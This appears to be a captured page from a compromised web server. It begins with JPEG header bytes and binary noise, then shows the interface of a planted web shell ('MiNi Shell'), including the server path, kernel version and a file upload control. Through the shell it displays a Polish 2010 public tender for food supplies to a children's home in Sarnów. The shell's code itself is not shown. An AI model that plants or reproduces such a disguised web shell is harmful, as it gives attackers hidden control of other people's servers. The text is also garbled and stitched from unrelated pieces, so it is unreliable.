JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100713/206974-N-2010.html

<p class="kh_header"><b>Psary: Zakup i sukcesywna dostawa żywności dla potrzeb kuchni Domu Dziecka im. Dominika Savio w Sarnowie</b><br>
<b>Numer ogłoszenia: 206974 - 2010; data zamieszczenia: 13.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Dziecka im. Dominika Savio w Sarnowie , ul. Wiejska 104, 42-512 Psary, woj. śląskie, tel. 32 267 21 46, faks 32 267 21 46.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i sukcesywna dostawa żywności dla potrzeb kuchni Domu Dziecka im. Dominika Savio w Sarnowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa art. spozywczych i żywności dla 150 wychowanków na okres 12 miesięcy.
Przedmiot zamówienia podzielony został na 6 części:
Część I     -   Artykuły spożywcze - różne i mrożonki
Część II    -  Jajka i nabiał
Część III   -  Pieczywo
Część IV   -  Drób, mięso i wędliny
Część V    -  Ryby
Część VI   -  Warzywa i owoce
Szczegółowy opis przemiotu zamówienia w SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.20.00-6, 15.11.11.30-5, 15.20.00.00-0, 15.50.00.00-3, 15.80.00.00-6, 15.81.00.00-9, 03.22.00.00-9, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie zgodne z art. 22 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie zgodne z art. 22 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie zgodne z art. 22 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie zgodne z art. 22 ustawy PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ------------------<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Dziecka im. Dominika Savio 
42 - 512 Sarnów, ul. Wiejska 104
tel./fax 32 267 21 46.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2010 godzina 09:00, miejsce: Dom Dziecka im. Dominika Savio - sekretariat
42 - 512 Sarnów, ul. Wiejska 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze - różne i mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i sukcesywna dostawa żywności.
Dostawa obejmuje następujący asortyment:
Ananasy	szt.	15
Batoniki	szt.	330
Barszcz biały 0,5l	Szt.	246
Barszcz czerwony instant 50g	szt.	20
Brzoskwinia w puszce 850g	szt.	16
Budyń 40g	kg	70
Chrzan konserwowy 300g	kg	75
Cukier 1 kg	kg	4000
Cukier wanilinowy 32g	szt.	45
Czekolada mleczna	szt.	470
Cukierki czekoladowe	kg	40
Cynamon 20g	szt.	140
Drożdże spożywcze 100g	szt.	120
Dżem brzoskwiniowy	szt.	210
Dżem czarna porzeczka	szt.	160
Dżem truskawkowy 300g	szt.	300
Dżem wiśniowy 300g	szt.	170
Flaki wołowe	szt.	90
Fasola nasiona suche	kg	270
Fasola konserwowa	szt.	6
Galaretka owocowa 75g	szt.	100
Grzyby suszone	kg	3
Gałka	szt.	10
Gulasz angielski	szt.	500
Groch łupany 500g	kg	120
Groszek konserwowy 400g	szt.	70
Hamburgery	kg	50
Herbata granulowana 100g	szt.	1700
Jabłka prażone	kg	10
Kinder batonik	szt	250
Kminek	szt	15
Kakao 100g	szt.	200
Kasza jęczmienna 1kg	kg	350
Kasza manna 1kg	kg	450
Kapusta czerwona szt	szt.	170
Kawa zbożowa Inka	szt.	800
Ketchup 500 g	szt.	100
Kisiel 40g	kg	250
Konserwa turystyczna	szt.	320
Koncentrat pomidorowy 200g	szt.	210
Konfitura	szt.	100
Kasza manna	kg	410
Kasza jęczmienna	kg	420
Koncentrat grzybowy	szt.	70
Krem czekoladowy Nutella 350g	szt.	710
Kukurydza duża	szt.	20
Kukurydza mała	szt.	30
Kwasek cytrynowy 20g	szt.	15
Liść laurowy	szt.	5
Nektar brzoskwiniowy	szt.	650
Markizy ciastka	szt.	350
Magi	szt.	100
Majeranek 20 g	szt.	100
Majonez 500 g	szt.	100
Makaron świderek 1 kg	szt.	500
Makaron łazanki	szt.	20
Makaron pióra	szt.	350
Makaron kolanko	szt.	450
Makaron spaghetti	szt.	200
Makaron świderek	szt.	460
Makaron nitki	szt.	200
Makaron muszelka	szt.	200
Makaron zacierka 250g	szt.	200
Mąka pszenna typ 550	szt.	1600
Mąka ziemniaczana 500 g	szt.	200
Mleko w proszku 400g	szt.	600
Miód wielokwiatowy	szt.	650
Musztarda 200g	szt.	300
Ogórki konserwowe 4250g	szt.	33
Ogórki konserwowe 900g	szt.	100
Olej słonecznikowy 1l	szt.	100
Paluszki	szt.	260
Papryka mielona	kg	6
Papryka konserwowa	szt.	100
Przyprawa do ryb	szt.	50
Pasztet pieczony	kg	360
Przyprawa Jarzynka	kg	270
Przyprawa do ryb	szt.	60
Paprykarz szczeciński 330g	szt.	420
Pieprz	kg	15
Paszteciki z kurczaka 160g	szt.	2100
Powidła śliwkowe	szt.	50
Płatki owsiane 0,5 kg	kg	300
Płatki kukurydziane	szt	230
Przecier ogórkowy 300g	szt	210
Przyprawa typu jarzynka 20g	kg	250
Ryż uniwersalny 1 kg	kg	1000
Sałatka szwedzka	szt	250
Sałatka rybna	szt.	550
Sól 1 kg	szt.	600
Sos ketchup	l	330
Szczaw konserwowy	szt.	200
Sos hamburgerowy	szt.	100
Sos tatarski	szt.	110
Tuńczyk 1,7 kg	szt.	5
Wafle kakaowe	kg	20
Woda mineralna niegaz. 0,5 l	szt.	150
Woda mineralna gaz. 0,5 l	szt.	150
Żurek biały 0,5 l	szt.	320
MROŻONKI		
Fasolka mrożona 450g	kg	300
Kalafior mrożony 450 g	kg	350
Pierogi z serem	kg	150
Pierogi z mięsem	kg	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Jajka i nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i sukcesywna dostawa żywności.
Dostawa obejmuje następujący asortyment:
Jogurt owocowy kubek 150g.	szt.	1500
Masło śmietankowe 200g	szt.	770
Margaryna 250g.	szt.	550
Margaryna RAMA 500g	szt.	3700
Mleko 3,2 %	l	24200
Ser żółty 	kg	500
Ser Wędzony	kg	300
Serki topione 100 g	szt.	3000
Serki owocowe	szt.	3300
Serek Turek 450 g	szt.	200
Kefir	szt.	200
Ser twarogowy półtłusty	       kg	1000
Serek ziarnisty	Szt	1100
Serki topione małe	Szt	800
Śmietana	l.	450
JAJKA	szt	28000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i sukcesywna dostawa żywności.
Dostawa obejmuje następujący asortyment:
Bułeczki do hot dogów	Szt.	2600
Bułka pszenna	Szt.	53000
Bułka tarta	Kg	320,50
Bułki słodkie z nadzieniem 
(ser, dżem, owoce)	Szt.	1700
Chleb zwykły	Szt.	21000
Chleb graham	Szt.	90
Ciasto drożdżowe	Kg	500
Babka piaskowa 	Kg	50
Jabłecznik	Kg	80
Miodownik	Kg	50
Sernik	Kg	100
Groszek ptysiowy	Kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Drób, mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i sukcesywna dostawa żywności.
Dostawa obejmuje następujący asortyment:
Filet z kurczaka	Kg	500
Kurczak świeży	Kg	1200
Udziec z indyka	Kg	80
Porcje rosołowe	Kg	900
Żołądki z kurczaka	Kg	120
Wątróbka z kurczaka	Kg	350
Kurczak wędzony	Kg	30
Baleron	kg	50
Boczek wędzony	kg	410
Frankfuterki	kg	350
Kabanosy	kg	5
Karczek b/k	kg	600
Kaszanka	kg	350
Kiełbasa kminkowa, żywiecka	kg	60
Kiełbasa mortadela	kg	80
Kiełbasa parówkowa	kg	600
Kiełbasa podwawelska	kg	100
Kiełbasa toruńska	kg	300
Kiełbasa zwyczajna	kg	700
Łopatka b/k	kg	1400
Metka łososiowa	kg	120
Metka tatarska	kg	35
Mielonka 	kg	200
Pasztetowa	kg	250
Polędwica luksusowa	kg	60
Polędwica sopocka 	kg	60
Polędwica z indyka	kg	140
Porcje rosołowe	kg	1000
Salceson	kg	200
Schab z/k	kg	400
Słonina	kg	140
Smalec	kg	230
Szynka delikatesowa	kg	60
Szynka kanapkowa	kg	500
Szynka wiejska	kg	500
Szynka z indyka	kg	140
Szynkowa	kg	80
Wątroba wieprzowa	kg	150
Wołowina - pieczeń	kg	80
Wołowina - pręga	kg	100
Wołowina - szponder	kg	70
Żeberka	kg	160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.20.00-6, 15.11.31.13-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i sukcesywna dostawa żywności.
Dostawa obejmuje następujący asortyment:
Dorsz	kg	500
Filet z tilapii	kg	15
Filet z mintaja	kg	55
Mintaj	kg	20
Morszczuk	kg	90
Filet z pangi	kg	120
Makrela wędzona	kg	250
Śledzie	kg	200
Salsa śledzie	kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i sukcesywna dostawa żywności.
Dostawa obejmuje następujący asortyment:
Botwinka	pęczek	20
Brukselka	kg	14
Brokuły	kg	220
Buraki czerwone świeże	kg	1000
Cebula	kg	700
Czosnek	kg	20
Fasola szparagowa	kg	370
Kalarepa	kg	20
Kapusta biała	kg	550
Kapusta czerwona	kg	250
Kapusta kiszona 0,5 kg	szt	1800
Kapusta pekińska	kg	160
Kapusta świeża biała	kg	550
Koper	pęczek	600
Marchew	kg	2000
Marchew z groszkiem	kg	370
Mieszanka owocowa	kg	2000
Mieszanka warzywna 7-składn.	kg	270
Pomidor	kg	700
Por	kg	20
Rzodkiewka	kg	400
Sałata zielona	szt	125
Szpinak	kg	70
Seler	kg	750
Szczypiorek	pęczek	130
Pietruszka zielona - natka	pęczek	700
Pietruszka korzeń	kg	550
Pieczarki	kg	150
Ziemniak młody	kg	7000
Arbuz	kg	150
Banany	kg	270
Brzoskwinie	kg	50
Cytryny	kg	410
Czereśnie	kg	40
Jabłka	kg	800
Jagody	kg	25
Mandarynki	kg	90
Pomarańcze	kg	40
Truskawki	kg	90
Winogron	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com